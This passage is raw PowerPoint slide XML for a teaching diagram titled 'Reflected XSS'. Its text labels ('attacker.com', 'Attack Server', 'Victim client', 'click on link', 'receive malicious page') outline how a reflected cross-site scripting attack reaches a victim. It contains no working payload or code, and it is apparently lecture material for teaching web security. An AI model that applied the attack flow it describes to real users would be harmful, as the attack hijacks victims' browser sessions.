                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2209800" y="2835275"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2336296" y="2842577"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C9EF0B3-5038-DE43-A68F-EAED9266FFA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B210ADA8-C32E-8340-82DD-2A9E5D6E2BA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6397625" y="3001772"/>
            <a:ext cx="1448435" cy="259045"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-CN" sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>.com</a:t>
            </a:r>
            <a:endParaRPr sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>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09600" y="2907136"/>
            <a:ext cx="1417532" cy="1264284"/>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5959475" y="5208588"/>
            <a:ext cx="1148521" cy="1406460"/>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5631877" y="2133600"/>
            <a:ext cx="2301433" cy="744601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6016625" y="1767840"/>
            <a:ext cx="1520825" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046288" y="2169971"/>
            <a:ext cx="3115945" cy="667385"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3115945" h="667385">
                <a:moveTo>
                  <a:pt x="0" y="666891"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3115751" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109603" y="2130986"/>
            <a:ext cx="121635" cy="91421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="4130040"/>
            <a:ext cx="1379220" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20940000">
            <a:off x="3039428" y="2019637"/>
            <a:ext cx="1478043" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>visit </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-232" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>site</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2141833" y="2532063"/>
            <a:ext cx="3345179" cy="751840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3345179" h="751839">
                <a:moveTo>
                  <a:pt x="3344565" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="751639"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2072757" y="3231015"/>
            <a:ext cx="121762" cy="91280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20880000">
            <a:off x="2583092" y="2558458"/>
            <a:ext cx="2540663" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-187" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>page</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="4191000"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="5094017"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3131668" y="4324147"/>
            <a:ext cx="1325052" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>click </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-225" baseline="1388" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="182562" y="365124"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="218344" y="3540"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283848" y="30672"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334452" y="81276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="361584" y="146780"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590800" y="2178050"/>
            <a:ext cx="365125" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="365125" h="365125">
                <a:moveTo>
                  <a:pt x="0" y="182562"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6521" y="134030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="90419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="24925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="6521"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252426" y="13896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="53471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351228" y="112698"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="365124" y="182562"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="358603" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340199" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="311653" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="274705" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231094" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="182562" y="365124"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134030" y="358603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="90419" y="340199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53471" y="311653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24925" y="274705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6521" y="231094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="182562"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2717296" y="2185352"/>
            <a:ext cx="164465" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
